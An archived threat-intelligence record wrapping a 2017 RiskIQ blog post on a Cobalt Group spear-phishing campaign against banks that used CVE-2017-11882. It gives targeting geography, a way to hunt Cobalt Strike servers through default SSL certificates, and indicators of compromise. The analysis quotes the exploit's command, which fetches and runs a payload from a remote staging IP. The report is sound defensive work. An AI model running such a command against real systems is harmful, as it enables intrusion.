{ "id": "9bd15da2-79fa-49d6-ae9c-f5746a56817a", "created_at": "2026-04-06T01:32:33.103578Z", "updated_at": "2026-04-10T03:35:12.460933Z", "deleted_at": null, "sha1_hash": "0c84c3b08e8e4b4dde6f2af77307e875b634eed6", "title": "Cobalt Group Gaffe Reveals All Targets in Attack on Financial Institutions", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 519204, "plain_text": "Cobalt Group Gaffe Reveals All Targets in Attack on Financial\r\nInstitutions\r\nBy November 28, 2017 Yonathan Klijnsma\r\nPublished: 2017-11-29 · Archived: 2026-04-06 01:25:34 UTC\r\nIn a recent spear-phishing campaign, the Cobalt Hacking Group used a remote code execution vulnerability in\r\nMicrosoft Office software to connect to its command and control server via Cobalt Strike. However, they gave up\r\nmuch more information than they intended.\r\nOn Tuesday, November 21, a massive spear-phishing campaign began targeting individual employees at various\r\nfinancial institutions, mostly in Russia and Turkey. Purporting to provide info on changes to ‘SWIFT’ terms, the\r\nemail contained a single attachment with no text in the body. It was an attempt by the Cobalt Group to gain a\r\nfoothold in the networks of the targeted individuals’ organizations:\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 1 of 7\n\nFig-1 What the targets saw\r\nHowever, rather than putting their targets in BCC, the attackers put the entire list in the ‘TO’ field allowing us to\r\nsee their full list of intended targets. This isn’t the first time we’ve seen attackers make this error—back in March,\r\nan attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw.\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 2 of 7\n\nFig-2 As first seen on Twitter\r\nPayload Analysis\r\nThe attachment in the email is an RTF document abusing the recently disclosed exploit referred to as CVE-2017-\r\n11882 which is capable of leveraging Office 2007 to 2016 to execute code. The file ‘Swift changes.rtf’ uses this\r\nexploit to start a remote payload like so:\r\ncmd /c start \\\\138.68.234.128\\w\\w.exe \u0026AAAAAC\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 3 of 7\n\nThe payload is a stager for a tool known as ‘Cobalt Strike’ which, normally, is used in red teaming and pen testing\r\nengagements. The framework has gained some notoriety with adversaries as it’s been used in multiple attacks\r\nagainst financial institutions in the past.\r\nThe Cobalt Strike beacon eventually connects to 104.144.207.207 which is the group’s command and control\r\nserver for this attack. A very detailed analysis of the Cobalt Group’s activities and the way they operate can be\r\nfound here: [ Cobalt strikes back: an evolving multinational threat to finance ].\r\nTargets\r\nWe won’t be disclosing the recipients of the email, but we will take a look at the targeting from a geographical\r\nperspective. The majority of targeting was focused on Turkey and Russia, but there was also a broad attempt at a\r\ncompromise, targeting employees of one financial institution in eight different countries.\r\nOur list of countries in which employees were targeted includes the United States, Netherlands, Italy, Austria,\r\nUkraine, Turkey, Ukraine, Russia, Jordan, Kuwait, and the Czech Republic:\r\nFig-3 Targeted countries highlighted in red\r\nOne thing we noticed when analyzing the targets of this campaign was that there were a lot of direct employee\r\nemail addresses on the list, which make their emails more convincing. More interesting is that the majority of\r\nthese email addresses were found simply by Googling for email addresses for the financial institution making it\r\nlikely the attackers used open source intelligence to gather their list of targets, and no prior information was\r\nneeded to get the addresses.\r\nFinding More Cobalt Strike\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 4 of 7\n\nAt RiskIQ, one of the datasets built from our large quantities of Internet data is a repository of SSL certificates and\r\nwhere we’ve seen them. What’s interesting about the case mentioned above is that the host is using a certificate\r\nseemingly shipped with Cobalt Strike by default. We can look up the certificate in RiskIQ Community via its\r\nSHA1 fingerprint: 6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c\r\nFig-4 SSL data inside RiskIQ Community\r\nWhat we find is that at least a 100 different hosts seem to have been running an HTTPS server with the same\r\ncertificate. If we jump over to our SIS API, we find that there have been 816(!) hosts running an HTTPS server\r\nwith this certificate—all Cobalt Strike servers using a default certificate. To ensure our findings were correct, we\r\nconfirmed them with previously reported threats that involved Cobalt Strike.\r\nFrom the data gathered through SIS, we can create some statistics on the setup of these Cobalt Strike servers. Port\r\nusage:\r\nPort Hosts observed\r\n443 811\r\n465 4\r\n995 1\r\nBelow is the amount of Cobalt Strike servers actively seen in our data from June 2015 until March 2016:\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 5 of 7\n\nFig-5 Instances of Cobalt Strike servers detected by RiskIQ\r\nOne thing to keep in mind is that Cobalt Strike is not always used by adversaries with malicious intent. Formally,\r\nCobalt Strike is sold as a toolset for pen testing and red teaming engagements.\r\nWe’ve put all the hosts we’ve seen running Cobalt Strike with a default SSL certificate in a RiskIQ Community\r\nproject. The SSL certificate is also included in this set: https://community.riskiq.com/projects/19bb67dd-2c51-\r\n7284-e5f2-7b79537e13d3\r\nIndicators of Compromise (IOCs)\r\nThe following IOCs are only related to the above spear-phishing campaign. The larger set of Cobalt Strike servers\r\nwe identified can be found in this RiskIQ Community Project mentioned in the previous section.\r\nNetwork IOCs\r\nDomain IP Address Purpose\r\n– 138.68.234.128 Payload staging server\r\n– 104.144.207.207 Cobalt Strike server\r\nFilesystem IOCs\r\nFilename MD5 Purpose\r\nSwift\r\nchanges.rtf\r\nf360d41a0b42b129f7f0c29f98381416\r\nCVE-2017-11882 exploit document downloading\r\nCobalt Strike beacon\r\nw.exe d46df9eacfe7ff75e098942e541d0f18 Cobalt Strike beacon\r\nLearn More\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 6 of 7\n\nRiskIQ gathers petabytes of data through crawling the entire internet and has amassed data sets that include SSL\r\ncertificates and many more. SSL certificates can provide context by showing whether a domain or IP is legitimate\r\nbased on its certificate, identify self-signed certificates versus third-party authority, and identify IP clusters and\r\nadditional certificates based on shared certificates. Click here for more information about how analysts can use\r\nSSL certificates to connect disparate malicious network infrastructure. \r\nTrack the IOCs from this attack, including those listed above, in the RiskIQ Community Project located here.\r\nSource: https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nhttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/" ], "report_names": [ "cobalt-strike" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51", "created_at": "2022-10-25T16:07:23.474746Z", "updated_at": "2026-04-10T02:00:04.623746Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "ATK 67", "Cobalt Gang", "Cobalt Spider", "G0080", "Gold Kingswood", "Mule Libra", "TAG-CR3" ], "source_name": "ETDA:Cobalt Group", "tools": [ "ATMRipper", "ATMSpitter", "Agentemis", "AmmyyRAT", "AtNow", "COOLPANTS", "CobInt", "Cobalt Strike", "CobaltStrike", "Cyst Downloader", "Fareit", "FlawedAmmyy", "Formbook", "Little Pig", "Metasploit Stager", "Mimikatz", "More_eggs", "NSIS", "Nullsoft Scriptable Install System", "Pony Loader", "Ripper ATM", "SDelete", "Siplog", "SoftPerfect Network Scanner", "SpicyOmelette", "Taurus Builder", "Taurus Builder Kit", "Taurus Loader", "Terra Loader", "ThreatKit", "VenomKit", "cobeacon", "win.xloader" ], "source_id": "ETDA", "reports": null }, { "id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242", "created_at": "2022-10-25T15:50:23.744036Z", "updated_at": "2026-04-10T02:00:05.294413Z", "deleted_at": null, "main_name": "Cobalt Group", "aliases": [ "Cobalt Group", "GOLD KINGSWOOD", "Cobalt Gang", "Cobalt Spider" ], "source_name": "MITRE:Cobalt Group", "tools": [ "Mimikatz", "More_eggs", "SpicyOmelette", "SDelete", "Cobalt Strike", "PsExec" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439153, "ts_updated_at": 1775792112, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0c84c3b08e8e4b4dde6f2af77307e875b634eed6.pdf", "text": "https://archive.orkl.eu/0c84c3b08e8e4b4dde6f2af77307e875b634eed6.txt", "img": "https://archive.orkl.eu/0c84c3b08e8e4b4dde6f2af77307e875b634eed6.jpg" } }